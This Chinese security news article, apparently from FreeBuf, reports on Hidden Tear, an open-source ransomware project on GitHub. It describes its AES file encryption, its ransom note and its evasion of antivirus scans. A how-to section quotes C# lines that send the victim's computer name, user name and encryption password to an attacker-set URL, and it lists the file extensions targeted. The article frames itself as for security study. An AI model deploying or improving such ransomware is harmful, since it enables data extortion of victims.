全球首款开源勒索软件 – Hidden Tear

FreeBuf曾经报道过众多的勒索软件,而勒索软件的成本也越来越低。今年5月,暗网中曾出现过三步即可傻瓜化制作勒索软件的Tox工具,现在,GitHub上出现了一款开源的勒索软件Hidden Tear。

全球首款开源勒索软件 – Hidden Tear

功能

使用AES算法加密文件  把加密密钥发送到某个服务器  被加密的文件可以通过密钥和解密软件解密  软件会在用户桌面创建一个文本文件,包含勒索信息(如:让受害者如何汇款等信息)

特色

软件仅有12KB

根据2015年8月15日的扫描结果,35款杀毒软件无一款检测出病毒。

演示视频

使用方法

你得要有一个web服务器,并且支持脚本语言,如php,python等。将此行修改成你的URL(最好使用https连接,防止窃听)

string targetURL = "http://www.utkusen.com/hidden-tear/write.php?info=";

脚本会将GET参数写入一个文本文件中,发送的进程则是在SendPassword()函数中

string info = computerName + "-" + userName + " " + password;  var fullUrl = targetURL + info;  var conent = new System.Net.WebClient().DownloadString(fullUrl);

你还可以修改会被加密的文件的后缀列表,默认列表为:

var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

实际上这款软件有很多地方仍需改进,比如软件所使用的AES加密是对称性的加密,并不适合勒索软件,但正是由于软件是开源的,大家可以不断完善它。

文中提及的部分技术和工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。

* 参考来源GitHub,vulture翻译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)